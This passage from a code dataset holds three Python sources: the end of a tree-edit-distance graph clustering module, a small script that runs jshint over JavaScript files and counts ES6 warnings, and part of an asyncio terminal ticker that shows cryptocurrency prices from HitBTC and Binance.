attribute, and the associated values are used\n to sort children in trees.\n\n Returns:\n a tuple (M, nodes, indices), where\n - M is a `numpy.ndarray` of shape (n,n) (where n is the number of nodes)\n - nodes is a list containing all nodes (exactly once)\n - indices is a dict from nodes to indices.\n The entry M[i,j] is the ZSS (tree edit) distance\n between the trucated universal trees at `node[i]` and `node[j]`. \n \"\"\"\n nodes = list(G.nodes)\n n = len(nodes)\n d = {}\n indices = {}\n for i in range(n):\n d[nodes[i]] = SpecialNode(G, nodes[i], t, nodeColoring, order_label)\n indices[nodes[i]] = i\n M=np.ndarray((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n M[i,j] = zss.simple_distance(d[nodes[i]], d[nodes[j]])\n for i in range(n):\n for j in range(i + 1):\n if i == j:\n M[i,j] = 0 \n else:\n M[i,j] = M[j,i]\n return (M, nodes, indices)\n\ndef agclust(G, t, num_clusters, M=None, nodes=None, indices=None, nodeColoring=None, linkage_type=\"single\", order_label=None):\n \"\"\"\n Given a graph G, it produces an agglomerative\n clustering with `num_clusters` clusters. The result is returned in the same form as that returned by\n `sklearn.cluster.AgglomerativeClustering`. It also returns the distance matrix used (which is M or\n the one obtained computing all zss distances for trees of height t), the \n list of nodes (in the order of indices in the matrix) and a map from nodes to indices.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth (used only if M is not None).\n num_clusters (int): the number of clusters to be produced.\n M (`numpy.ndarray`): the distance matrix (if None, `cached_zss_dist_matrix(G, t, nodeColoring)` is used).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n nodeColoring (dict): used to compute the distance matrix (when M is not None).\n linkage_type (str): the linkage type used to compute distances.\n order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n to sort children in trees.\n\n Returns:\n a tuple (clustering, M, nodes, indices):\n - clustering as returned by `sklearn.cluster.AgglomerativeClustering` (labels are stored in the list `clustering.labels_`)\n - M the matrix used for clustering\n - nodes the list of nodes used to index M\n - indices the dictionary from nodes to indices.\n \"\"\"\n if M is None:\n M, nodes, indices = cached_zss_dist_matrix(G, t, nodeColoring, order_label)\n clustering = sklearn.cluster.AgglomerativeClustering(\n affinity=\"precomputed\", linkage=linkage_type, \n n_clusters=num_clusters, compute_distances=True)\n clustering.fit(M)\n return (clustering, M, nodes, indices)\n\n\ndef agclust_varcl(G, t, minCl, maxCl, M=None, nodes=None, indices=None, nodeColoring=None, linkage_type=\"single\", order_label=None):\n \"\"\"\n Given a graph G, it computes a clustering (calling `agclust`)\n clustering with a number of clusters varying from minCl (inclusive) to maxCl (exclusive).\n For every clustering the resulting silhouette score is computed (`sklearn.metrics.silhouette_score`).\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth (used only if M is not None).\n minCl (int): the minimum number of clusters to be produced (inclusive).\n maxCl (int): the maximum number of clusters to be produced (exclusive).\n M (`numpy.ndarray`): the distance matrix (if None, `cached_zss_dist_matrix(G, t, nodeColoring)` is used).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n nodeColoring (dict): used to compute the distance matrix (when M is not None).\n linkage_type (str): the linkage type used to compute distances.\n order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n to sort children in trees.\n\n Returns:\n The result returned is the same as in `agclust`, but the first component is a dictionary with \n keys the number of clusters and values are a pair made by the the corresponding clustering and the silhouette score. Note \n that if for some specific number of clusters the clustering procedure raises an exception, we just avoid\n adding the corresponding result to the dictionary.\n \"\"\"\n if M is None:\n M, nodes, indices = cached_zss_dist_matrix(G, t, nodeColoring, order_label)\n res = {}\n for cl in range(minCl, maxCl):\n try:\n clustering = sklearn.cluster.AgglomerativeClustering(\n affinity=\"precomputed\", linkage=linkage_type, \n n_clusters=cl, compute_distances=True)\n clustering.fit(M)\n silhouette = sklearn.metrics.silhouette_score(M, clustering.labels_, metric=\"precomputed\")\n res[cl]=(clustering, silhouette)\n except Exception as exc:\n print(type(exc))\n print(exc.args)\n print(exc)\n pass\n return (res, M, nodes, indices)\n\ndef agclust_optcl(G, t, minCl, maxCl, M=None, nodes=None, indices=None, nodeColoring=None, linkage_type=\"average\", order_label=None):\n \"\"\"\n Given a graph G, it computes a clustering (calling `agclust`)\n clustering with a number of clusters varying from minCl (inclusive) to maxCl (exclusive).\n For every clustering the resulting silhouette score is computed (`sklearn.metrics.silhouette_score`),\n and the first clustering producing the maximal silhouette is returned (in the same form as in\n `agclust`.\n\n Args:\n G: a `networkx.MultiDiGraph`.\n t (int): the truncation depth (used only if M is not None).\n minCl (int): the minimum number of clusters to be produced (inclusive).\n maxCl (int): the maximum number of clusters to be produced (exclusive).\n M (`numpy.ndarray`): the distance matrix (if None, `cached_zss_dist_matrix(G, t, nodeColoring)` is used).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n nodeColoring (dict): used to compute the distance matrix (when M is not None).\n linkage_type (str): the linkage type used to compute distances.\n order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n to sort children in trees.\n\n Returns:\n a tuple (clustering, M, nodes, indices):\n - clustering as returned by `sklearn.cluster.AgglomerativeClustering` (labels are stored in the list `clustering.labels_`)\n - M the matrix used for clustering\n - nodes the list of nodes used to index M\n - indices the dictionary from nodes to indices.\n \"\"\"\n res, M, nodes, indices = agclust_varcl(G, t, minCl, maxCl, M, nodes, indices, nodeColoring, linkage_type, order_label)\n maxsilhouette=max([v[1] for v in res.values()])\n for optCl in res.keys():\n if res[optCl][1]==maxsilhouette:\n break\n return (res[optCl][0], M, nodes, indices)\n\ndef agclust2dict(clustering, M, nodes, indices):\n \"\"\"\n Given the results of agclust, produces a labelling for the nodes of G (a map from nodes to clusters).\n\n Args:\n clustering: a clustering as returned by `sklearn.cluster.AgglomerativeClustering` (labels are stored in the list `clustering.labels_`)\n M (`numpy.ndarray`): the distance matrix used to compute the clustering (ignored by this function).\n nodes (list): the list of nodes (used to index M); it must be None exactly when M is None.\n indices (dict): the dictionary from nodes to indices; it must be None exactly when M is None.\n\n Returns:\n a dictionary whose keys are nodes, and where two keys are associated the same value iff they belong to the same cluster.\n \"\"\"\n return {x: clustering.labels_[indices[x]] for x in nodes}\n \n \nclass SpecialNode(object):\n \"\"\"\n An alternative implementation of a zss.Node that does not need to actually unfold the paths.\n \"\"\"\n\n def __init__(self, G, x, depth, nodeColoring, order_label):\n \"\"\"\n Creates a node of a truncated universal total graph.\n\n Args:\n G: the graph (a `networkx.MultiDiGraph`)\n x: the node (the root of the universal total graph)\n depth (int): the depth of the view.\n nodeColoring (dict): if present, it is a map from nodes whose values are used to color the tree.\n order_label (str): if not None, every node must have that label as attribute, and the associated values are used\n to sort children in trees.\n \"\"\"\n self.G = G\n self.x = x\n self.depth = depth\n if nodeColoring is None:\n self.label = \"x\"\n else:\n self.label = nodeColoring[x]\n self.children = []\n if depth > 0:\n chl = []\n for s,t,d in G.in_edges(x, data=True):\n chl.append(s)\n if order_label is not None:\n d = nx.get_node_attributes(G, order_label)\n chl = sorted(chl, key=lambda node: d[node])\n for child in chl:\n self.children.append(SpecialNode(G, child, depth - 1, nodeColoring, order_label))\n\n @staticmethod\n def get_children(node):\n return node.children\n \n @staticmethod\n def get_label(node):\n return node.label\n\n def recprint(self, level):\n for i in range(level):\n print(\"\\t\", end=\"\")\n print(self.x)\n for c in self.children:\n c.recprint(level + 1)\n\ndef zss_tree_dist(G, x, y, maxLen, nodeColoring=None):\n \"\"\"\n Provides the zss.simple_distance between zss_all_paths(G,x,maxLen,nodeColoring) and zss_all_paths(G,y,maxLen,nodeColoring).\n\n Args:\n G: a `networkx.MultiDiGraph`.\n target: a node of G.\n maxLen (int): the maximum length of the paths returned.\n nodeColoring (dict): if not None, it is a dictionary with nodes as keys; the values are used to label the tree nodes.\n\n Returns: \n the ZSS (edit) distance between the trees obtained truncating at depth maxLen the universal total graphs of x and y in G.\n \"\"\"\n return zss.simple_distance(SpecialNode(G, x, maxLen, nodeColoring, None), SpecialNode(G, y, maxLen, nodeColoring, None))\n\ndef katz_preorder(G, order_label):\n \"\"\"\n Compute Katz centrality on (the simple version of) G, and add its value as a node attribute with the given label.\n\n Args:\n G: the graph involved.\n order_label: the label to be used for the new node attribute.\n \"\"\"\n nx.set_node_attributes(G, nx.katz_centrality(qf.graphs.to_simple(G)), order_label)\n\n \n ","repo_name":"boldip/qf","sub_path":"src/qf/qzss.py","file_name":"qzss.py","file_ext":"py","file_size_in_byte":17986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"12847384908","text":"import os\nimport re\nimport sys\nimport subprocess\n\ndef runner(filepath,arr):\n if os.path.isdir(filepath):\n for root, subFolders, files in os.walk(filepath):\n for file in files:\n if(file.endswith(\".js\")):\n f = os.path.join(root, file)\n runjshint(f,arr)\n elif os.path.isfile(filepath):\n runjshint(filepath,arr)\n print(arr)\ndef runjshint(f,arr):\n bashCommand = \"jshint \"+f\n process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n outarr = output.decode(\"utf-8\").split('\\n')\n for item in outarr:\n if \"ES6\" in item:\n keyname = item.split(\", \")[-1]\n if keyname in arr.keys():\n arr[keyname]+=1\n else:\n arr[keyname]=1\n return arr\nif __name__ == \"__main__\":\n arr={};\n runner(sys.argv[1],arr)\n","repo_name":"MadhuNimmo/jsHintRunner","sub_path":"jshintRunner.py","file_name":"jshintRunner.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20577936555","text":"#!/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nUsage::\n\n tc-ticker [NUM] [PAIR ...]\n\n Show NUM volume leaders and/or named PAIRs, which can take any of the\n following (case-insensitive) forms:\n\n basequote, base_quote, base/quote, \"base quote\"\n\n For now, all options are env-var based and subject to change\n\nWarning\n-------\nWhether due to my own failings or those of the exchange, the market data\ndisplayed is often inaccurate and should be considered untrustworthy.\n\n\"\"\"\n# Author: Jane Soko\n# License: Apache 2.0\n\nimport asyncio\nimport os\nimport sys\nfrom decimal import Decimal as Dec\nfrom enum import Enum\n\nif __name__ == \"__main__\":\n sys.path.insert(0, os.path.dirname(\n os.path.dirname(os.path.abspath(__file__))))\n\nfrom terminal_coin_ticker import ( # noqa E402\n add_async_sig_handlers, remove_async_sig_handlers, ppj, decimate\n)\nfrom terminal_coin_ticker.clients import hitbtc, binance # noqa E402\n\n# Env vars\nEXCHANGE = \"HitBTC\" # Or Binance (slim pickings, at the moment)\nVOL_SORTED = True # Sort all pairs by volume, AUTO_FILL'd or named\nVOL_UNIT = \"USD\" # BTC, ETH, etc., or null for base currencies\nHAS_24 = False # Override COLORTERM if outlawed in environment\nPULSE = \"normal\" # Flash style of \"normal,\" \"fast,\" or null (off)\nPULSE_OVER = 0.125 # Flash threshold as % change in last price\nHEADING = \"normal\" # Also \"hr_over,\" \"hr_under,\" \"full,\" and \"slim\"\nAUTO_CULL = True # Drop excess PAIRs, and warn instead of exiting\nAUTO_FILL = True # Absent NUM, add volume leaders till MAX_FILL\nMAX_FILL = 24 # Or null/non-int to use term height (absent NUM)\nSTRICT_TIME = True # Die when service notifications aren't updating\nVERBOSITY = 6 # Ignored without LOGFILE (device, file, etc.)\nUSE_AIOHTTP = False # Ignored unless ``websockets`` is also installed\n\n# TTL vars\nMAX_STALE = 0.5 # Tolerance threshold ratio of stale/all pairs\nSTALE_SECS = 15 # Max seconds pair data is considered valid\nPOLL_INTERVAL = 10 # Seconds to wait between checks\n\n\nclass Headings(Enum):\n slim = 1\n normal = hr_over = hr_under = 2\n full = 3\n\n\ndef _convert_volume(client, sym, base, quote, tickdict):\n \"\"\"\n Return volume in target units. Assumptions:\n 1. ``target`` exists in ``client.markets``\n 2. ``sym`` is canonical (in correct format and confirmed available)\n 3. ``tickdict`` has been decimated (digit strings to Decimal instances)\n \"\"\"\n # XXX this might be better suited as a decorator that returns a\n # converter already primed with all the exchange particulars.\n target = VOL_UNIT\n #\n # At least for HitBTC, Symbol records have a \"quoteCurrency\" entry\n # that's always \"USD\", but some symbols end in \"USDT\"\n if sym.endswith(target) or (target == \"USD\" and sym.endswith(\"USDT\")):\n return tickdict[\"volQ\"]\n #\n assert client.conversions is not None\n if quote + target in client.conversions:\n rate = Dec(client.ticker[quote + target][\"last\"])\n else:\n rate = 1 / Dec(client.ticker[target + quote][\"last\"])\n return Dec(client.ticker[sym][\"volQ\"]) * rate\n\n\ndef _print_heading(client, colors, widths, numrows, volstr):\n from subprocess import check_output\n try:\n sitm = check_output([\"tput\", \"sitm\"]).decode()\n ritm = check_output([\"tput\", \"ritm\"]).decode()\n except FileNotFoundError:\n sitm = ritm = \"\"\n else:\n if not ritm:\n sitm = \"\"\n #\n bg, fg = colors\n #\n align_chars = (\"<\", \">\" if VOL_UNIT else \"<\", \"<\", \"<\", \">\", \"\")\n if HEADING not in (\"normal\", \"slim\"):\n align_chars = (\"\", \"<\") + align_chars\n #\n _w = widths[2:] if HEADING in (\"normal\", \"slim\") else widths\n head_fmt = \"\".join(\"{:%s%d}\" % (a, w) for a, w in zip(align_chars, _w))\n #\n nl = \"\\x1b[m\\n\"\n # heading background\n head_bg = bg.dark\n # heading foreground\n head_fg = fg.head_alt if HAS_24 else fg.dim\n # board\n board = (\n *(bg.dark if HAS_24 else bg.tint, \" \" * sum(widths),\n \"\\x1b[m\\n\") * (numrows - 1),\n bg.dark if HAS_24 else bg.tint, \" \" * sum(widths), \"\\x1b[m\\x1b[K\"\n )\n if HEADING == \"normal\":\n print(head_bg, \" \" * widths[0], # heading background, left margin\n # exchange\n fg.dark, sitm,\n \"{:<{w}}\".format(client.exchange, w=widths[1]), ritm,\n # heading\n head_fg, head_fmt.format(\"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl,\n # hr\n head_bg, fg.dark, \"\\x1b[4m\", \"─\" * sum(widths), nl,\n # board\n *board, sep=\"\", end=\"\")\n elif \"hr_\" in HEADING:\n ex_hr = (head_bg, sitm, fg.faint_shade if HAS_24 else fg.dark,\n \"─\" * widths[0], client.exchange,\n \"─\" * (sum(widths) - len(client.exchange) - widths[0]), nl)\n heading = (head_bg, head_fg,\n head_fmt.format(\"\", \"\", \"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl)\n if HEADING == \"hr_over\":\n print(*ex_hr, *heading, *board, sep=\"\", end=\"\")\n else:\n print(*heading, *ex_hr, *board, sep=\"\", end=\"\")\n elif HEADING == \"full\":\n print( # exchange\n head_bg, sitm, fg.faint_shade if HAS_24 else fg.dark,\n \"─\" * (sum(widths) - len(client.exchange) - widths[-1]),\n client.exchange, \"─\" * widths[-1], ritm, nl,\n # heading\n head_bg, head_fg,\n head_fmt.format(\"\", \"Pair\", \"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl,\n # hr\n head_bg, fg.faint_shade if HAS_24 else fg.dark,\n \"\\x1b[4m\", \"─\" * sum(widths), nl,\n # board\n *board, sep=\"\", end=\"\")\n elif HEADING == \"slim\":\n print(head_bg, \" \" * widths[0], # heading background, left margin\n # exchange\n fg.dark, sitm, \"{:<{w}}\".format(client.exchange, w=widths[1]),\n ritm if HAS_24 else \"\",\n # heading\n head_fg, head_fmt.format(\"Price\", volstr, \"Bid\", \"Ask\",\n \"Δ (24h)\", \"\"), nl,\n # board\n *board, sep=\"\", end=\"\")\n\n\nasync def _check_timestamps(all_subs, client, kill_handler, strict=True,\n max_stale=MAX_STALE, stale_secs=STALE_SECS,\n poll_interval=POLL_INTERVAL):\n \"\"\"\n Iterate over latest ticker entries and check timestamps against ttl\n threshold. Like ``_paint_ticker_line()``, it doesn't make sense to\n return a value for this function because it can only die if its\n outer future is cancelled.\n\n Sending ``SIGINT`` to pid 0 raises ``BlockingIOError`` (errno 11).\n Raising a ``KeyboardInterrupt`` works, but the teardown handlers\n registered for ``SIGINT`` won't run.\n\n Note: The API docs imply that ``channel`` notifications are only\n pushed when a change in price has occurred. Simply juxtaposing the\n website's ticker with this one pretty much debunks this. Never mind\n that for many notification updates, only the timestamps have\n changed. For now, assume push consistency is governed by network\n load and other operating factors. Other APIs present\n heartbeat-related options that probably require an actual\n understanding of websockets standards/conventions.\n \"\"\"\n from itertools import cycle\n from datetime import datetime\n while not client.ticker_subscriptions:\n await asyncio.sleep(poll_interval)\n stale_subs = set()\n for sym in cycle(all_subs):\n ts_str = client.ticker[sym][\"time\"]\n if ts_str is None:\n continue\n diff = (datetime.utcnow() - client.make_date(ts_str)).seconds\n if diff > stale_secs:\n if LOGFILE:\n # Using ``*.call_soon`` doesn't seem to make a difference here\n client.echo(\"Stale timestamp for %r. Off by %d min %d secs\" %\n (sym, *divmod(diff, 60)), 5)\n stale_subs.add(sym)\n if strict and len(stale_subs) / len(all_subs) > max_stale:\n kill_handler(error=\"The number of pairs awaiting updates has \"\n \"exceeded the maximum allowed\",\n msg=\"Killed by _check_timestamps\")\n break\n else:\n client.ticker[sym][\"time\"] = None # <- mark as stale\n else:\n stale_subs.discard(sym)\n try:\n await asyncio.sleep(poll_interval)\n except asyncio.CancelledError:\n break\n client.echo(\"Exiting\", 6)\n return \"_check_timestamps cancelled\"\n\n\nasync def _paint_ticker_line(client, lnum, sym, semaphore, snapshots, fmt,\n colors, bq_pair, wait=1.0, pulse_over=PULSE_OVER):\n \"\"\"\n The kwargs are tweakable and should perhaps be presented as global\n options. ``wait`` is the update period. ``pulse_over`` is the\n red/green flash threshold.\n \"\"\"\n base, quote = bq_pair\n cbg, cfg = colors\n sep = \"/\"\n bg = cbg.shade if lnum % 2 else cbg.tint\n up = \"\\x1b[A\" * lnum + \"\\r\"\n down = \"\\x1b[B\" * lnum\n tick = Dec(client.symbols[sym][\"tick\"])\n last_seen = {}\n #\n # Delay pulsing while staggering initial update\n pulse_over, pulse_delay, pulse = Dec(pulse_over), 5, None\n _pulse_over = Dec(pulse_over + pulse_delay)\n from random import random\n #\n while True:\n # Without this, pulses get backlogged/front-loaded and fire in a\n # fusillade on init, sometimes after a short hang. Not sure why.\n if _pulse_over > pulse_over:\n _pulse_over -= Dec(1)\n _wait = random()\n try:\n await asyncio.sleep(_wait)\n except asyncio.CancelledError:\n break\n _wait = wait\n if pulse:\n latest = last_seen\n else:\n latest = decimate(dict(client.ticker[sym]))\n if client.quantize is True:\n for key in (\"last\", \"ask\", \"bid\"):\n latest[key] = latest[key].quantize(tick)\n if snapshots.get(sym) and snapshots[sym] == latest:\n continue\n last_seen = snapshots.setdefault(sym, latest)\n # Better to save as decimal quotient and only display as percent\n change = ((latest[\"last\"] - latest[\"open\"]) / latest[\"open\"])\n latest[\"chg\"] = change\n # Use explicit value for ``normal`` instead of ``\\e[39m`` to reset\n clrs = dict(_beg=bg, _sym=cfg.dim, _sepl=cfg.normal,\n _sepr=cfg.dim, _prc=cfg.normal, _vol=cfg.dim,\n _chg=\"\", _end=\"\\x1b[m\\x1b[K\")\n clrs[\"_chg\"] = (cfg.red if change < 0 else\n cfg.green if change > 0 else clrs[\"_vol\"])\n #\n volconv = None\n if VOL_UNIT:\n volconv = _convert_volume(client, sym, base, quote, latest)\n #\n if pulse:\n if HAS_24:\n clrs[\"_beg\"] = (cbg.mix_green if\n pulse == \"+\" else cbg.mix_red)\n else:\n clrs[\"_beg\"] = bg\n clrs[\"_prc\"] = clrs[\"_chg\"] = (\n cfg.bright_green if pulse == \"+\" else cfg.bright_red\n )\n clrs[\"_vol\"] = cfg.green if pulse == \"+\" else cfg.red\n _wait = 0.124 if PULSE == \"fast\" else 0.0764\n pulse = None\n elif latest[\"time\"] is None:\n clrs.update(dict(_sym=cfg.dark, _sepl=\"\", _sepr=\"\",\n _prc=(cfg.faint_shade if lnum % 2 else\n cfg.faint_tint), _vol=\"\", _chg=\"\"))\n change, pulse = 0, None\n # Must divide by 100 because ``_pulse_over`` is a %\n elif (abs(abs(latest[\"last\"]) - abs(last_seen[\"last\"])) >\n abs(_pulse_over / 100 * last_seen[\"last\"])):\n pulse = None\n _wait = 0.0764 if PULSE == \"fast\" else 0.124\n if change - last_seen[\"chg\"] > 0:\n pulse = \"+\"\n clrs[\"_beg\"] = cbg.green\n if not HAS_24:\n clrs.update(dict(_sym=cfg.green, _sepl=\"\", _sepr=\"\",\n _vol=\"\", _prc=\"\", _chg=\"\"))\n else:\n pulse = \"-\"\n clrs[\"_beg\"] = cbg.red\n if not HAS_24:\n clrs.update(dict(_sym=cfg.red, _sepl=\"\", _sepr=\"\",\n _vol=\"\", _prc=\"\", _chg=\"\"))\n try:\n with await semaphore:\n print(up,\n fmt.format(\"\", \"\", base=base.lower(), sep=sep,\n quote=quote.lower(), **clrs, **latest,\n volconv=volconv),\n down,\n sep=\"\", end=\"\", flush=True)\n except asyncio.CancelledError:\n break\n last_seen.update(latest)\n #\n return \"Cancelled _paint_ticker_line for: %s\" % sym\n\n\nasync def do_run_ticker(ranked, client, loop, manage_subs=True,\n manage_sigs=True):\n \"\"\"\n Common keys::\n\n \"ask\", \"bid\", \"last\", \"open\", \"volB\",\n \"volQ\", \"time\", \"sym\", \"chg\", \"chgP\"\n\n The value of ``open`` is that of ``last`` from 24 hours ago and is\n continuous/\"moving\". This can't be gotten with the various ``*Candle``\n calls because the limit for ``period=\"M1\"`` is 1000, but we'd need 1440.\n \"\"\"\n if manage_sigs:\n # Actually unnecessary since existing uses default handler\n old_sig_info = remove_async_sig_handlers(\"SIGINT\", loop=loop).pop()\n\n def rt_sig_cb(**kwargs):\n kwargs.setdefault(\"msg\", \"Received SIGINT, quitting\")\n out_futs.update(kwargs)\n if not all(t.cancelled() for t in tasks):\n client.echo(\"Cancelling tasks\")\n for task in tasks:\n task.cancel()\n # Not sure if this can ever run. Thinking is if user sends multiple\n # SIGINTs in rapid succession. Tried naive test w. kill util.\n # Didn't trigger, but need to verify.\n else:\n client.echo(\"Already cancelled: %r\" % gathered)\n loop.call_later(0.1,\n client.echo, \"Cancelled tasks: %r\" % tasks)\n add_async_sig_handlers(old_sig_info, loop=loop)\n\n # No need to partialize since ``gathered``, which ``rt_sig_cb``\n # should have closure over once initialized below, will be the same\n # object when the trap is sprung\n add_async_sig_handlers((\"SIGINT\", rt_sig_cb), loop=loop)\n #\n c_fg = client.foreground_256\n c_bg = client.background_256\n if HAS_24:\n if client.foreground_24 is None:\n globals()[\"HAS_24\"] = False\n else:\n c_fg = client.foreground_24\n c_bg = client.background_24\n #\n all_subs = set(ranked)\n # Ensure conversion pairs available for all volume units\n if VOL_UNIT:\n if \"USD\" not in VOL_UNIT and VOL_UNIT not in client.markets:\n # XXX should eventually move this block somewhere else\n return {\"error\": \"%r is not a market currency supported by %s\" %\n (VOL_UNIT, client.exchange)}\n if manage_subs:\n if VOL_UNIT == \"USD\" and \"USD\" not in client.markets:\n assert \"USDT\" in client.markets\n globals()[\"VOL_UNIT\"] = \"USDT\"\n all_subs |= await client.get_market_conversion_pairs(VOL_UNIT)\n else:\n client.echo(\"The ``VOL_UNIT`` option requires ``manage_subs``\", 3)\n globals()[\"VOL_UNIT\"] = None\n #\n # Results to return\n out_futs = {}\n #\n # Abbreviations\n cls, clt = client.symbols, client.ticker\n #\n if manage_subs:\n await asyncio.gather(*map(client.subscribe_ticker, all_subs))\n max_tries = 3\n while max_tries:\n if all(s in clt and s in cls for s in ranked):\n break\n await asyncio.sleep(1)\n max_tries -= 1\n else:\n out_futs[\"subs\"] = await asyncio.gather(\n *map(client.unsubscribe_ticker, all_subs)\n )\n out_futs[\"error\"] = \"Problem subscribing to remote service\"\n return out_futs\n #\n # TODO determine practicality of using existing volume rankings reaped\n # during arg parsing via in ``choose_pairs()``\n if VOL_UNIT and VOL_SORTED:\n vr = sorted((_convert_volume(client, s, cls[s][\"curB\"], cls[s][\"curQ\"],\n decimate(clt[s])), s)\n for s in ranked)\n ranked = [s for v, s in vr]\n #\n # Arbitrarily assume biggest volume and/or change could grow 10x between\n # open/close, so +1 for those.\n #\n # TODO move all this widths figuring to a separate coro that updates some\n # shared location at regular intervals. If max column width is exceeded,\n # just lower precision for the offending item. So, if some \"change\" value\n # were to grow from 99.99 to 100.00, make it 100.0 instead.\n sep = \"/\"\n volstr = \"Vol (%s)\" % (VOL_UNIT or \"base\") + (\" \" if VOL_UNIT else \"\")\n if VOL_UNIT:\n try:\n vprec = \"USD ETH BTC\".split().index(VOL_UNIT)\n except ValueError:\n vprec = 0 # Covers USDT and corners like BNB, XRP, BCH\n # Market (symbol) pairs will be \"concatenated\" (no intervening padding)\n sym_widths = (\n # Base\n max(len(cls[s][\"curB\"]) for s in ranked),\n # Sep\n len(sep),\n # Quote (corner case: left-justifying, so need padding)\n max(len(cls[s][\"curQ\"]) for s in ranked)\n )\n # Can't decide among exchange name, \"\" (blank), \"Pair,\" and \"Product\"\n widths = (\n # 1: Exchange name\n max(sum(sym_widths), len(client.exchange)),\n # 2: Price\n max(len(\"{:.2f}\".format(Dec(clt[s][\"last\"])) if\n \"USD\" in s else clt[s][\"last\"]) for s in ranked),\n # 3: Volume\n max(*(len(\"{:,.{pc}f}\"\n .format(_convert_volume(client, s, cls[s][\"curB\"],\n cls[s][\"curQ\"], decimate(clt[s])),\n pc=vprec) if VOL_UNIT else clt[s][\"volB\"])\n for s in ranked), len(volstr)),\n # 4: Bid\n max(len(\"{:.2f}\".format(Dec(clt[s][\"bid\"])) if\n \"USD\" in s else clt[s][\"bid\"]) for s in ranked),\n # 5: Ask\n max(len(\"{:.2f}\".format(Dec(clt[s][\"ask\"])) if\n \"USD\" in s else clt[s][\"ask\"]) for s in ranked),\n # 6: Change (should maybe do max++ for breathing room)\n max(len(\"{:+.3f}%\".format(\n (Dec(clt[s][\"last\"]) - Dec(clt[s][\"open\"])) / Dec(clt[s][\"open\"])\n )) for s in ranked),\n )\n pad = 2\n widths = (pad, # <- 0: Left padding\n *(l + pad for l in widths),\n pad) # <- 7: Right padding\n del cls, clt\n #\n # Die nicely when needed width exceeds what's available\n if sum(widths) > os.get_terminal_size().columns:\n msg = (\"Insufficient terminal width. Need %d more column(s).\"\n % (sum(widths) - os.get_terminal_size().columns))\n out_futs[\"error\"] = msg\n if manage_subs:\n out_futs[\"subs\"] = await asyncio.gather(\n *map(client.unsubscribe_ticker, all_subs)\n )\n return out_futs\n # Format string for actual line items.\n fmt_parts = [\n \"{_beg}{:%d}\" % widths[0],\n \"{_sym}{base}{_sepl}{sep}{_sepr}{quote:<{quote_w}}\",\n \"{_prc}{last:<%df}\" % widths[2],\n \"{_vol}\" + (\"{volconv:>%d,.%df}%s\" %\n (widths[3] - pad, vprec, \" \" * pad) if\n VOL_UNIT else \"{volB:<%df}\" % widths[3]),\n \"{bid:<%df}\" % widths[4],\n \"{ask:<%df}\" % widths[5],\n \"{_chg}{chg:>+%d.3%%}\" % widths[6],\n \"{:%d}{_end}\" % widths[7]\n ]\n fmt = \"\".join(fmt_parts)\n #\n _print_heading(client, (c_bg, c_fg), widths, len(ranked), volstr)\n #\n semaphore = asyncio.Semaphore(1)\n snapshots = {}\n coros = []\n for lnum, sym in enumerate(ranked):\n base = client.symbols[sym][\"curB\"]\n quote = client.symbols[sym][\"curQ\"]\n fmt_nudge = (\n \"\".join(\n (fmt_parts[n].replace(\"f}\", \".2f}\") if n in (1, 4, 5) else\n fmt_parts[n] for n in range(len(fmt_parts)))\n )\n if \"USD\" in quote and Dec(client.ticker[sym][\"last\"]) >= Dec(10)\n else fmt\n ).replace(\"{quote_w}\", \"%d\" % (widths[1] - len(base) - len(sep)))\n #\n coros.append(_paint_ticker_line(\n client, lnum, sym, semaphore, snapshots, fmt_nudge,\n (c_bg, c_fg), (base, quote), wait=(0.1 * len(ranked)),\n pulse_over=(PULSE_OVER if PULSE else 100.0)\n ))\n # Should conversion pairs (all_subs) be included here if not displayed?\n ts_chk = _check_timestamps(all_subs, client, rt_sig_cb, STRICT_TIME)\n #\n tasks = [asyncio.ensure_future(c) for c in (*coros, ts_chk)]\n gathered = asyncio.gather(*tasks)\n #\n try:\n out_futs[\"gathered\"] = await gathered\n except Exception as exc:\n # Repr of ``Future.exception`` only contains exc name\n out_futs[\"gathered\"] = gathered.exception()\n from traceback import print_exc, format_exc\n if LOGFILE:\n print_exc(file=LOGFILE)\n elif not isinstance(exc, asyncio.CancelledError):\n out_futs[\"gathered\"] = {\"error\": format_exc()}\n finally:\n if manage_subs:\n client.echo(\"Unsubscribing\", 6)\n gunsubs = asyncio.gather(*map(client.unsubscribe_ticker, all_subs))\n try:\n out_futs[\"subs\"] = await gunsubs\n # Catch network/inet errors, etc.\n except Exception:\n from traceback import print_exc, format_exc\n if LOGFILE:\n out_futs[\"subs\"] = gunsubs.exception()\n print_exc(file=LOGFILE)\n else:\n tb_str = format_exc()\n if \"ConnectionClosed\" not in tb_str:\n out_futs[\"subs\"] = {\"error\": tb_str}\n if manage_sigs:\n add_async_sig_handlers(old_sig_info, loop=loop)\n return out_futs\n\n\nasync def choose_pairs(client):\n \"\"\"\n If the length of named pairs alone exceeds the terminal height, trim\n from the end (rightmost args). Afterwards, reduce NUM leaders, as\n required. Print a warning for dropped syms if AUTO_CULL is on,\n otherwise raise a ValueError. Note: This will probably have to be\n redone when argparse stuff is added.\n \"\"\"\n num = None\n syms = []\n msg = []\n #\n if len(sys.argv) == 1:\n num = min(MAX_FILL, MAX_HEIGHT)\n elif sys.argv[1].isdigit():\n num = int(sys.argv[1])\n if num == 0: # Don't auto-fill regardless of AUTO_FILL\n num = None\n syms = 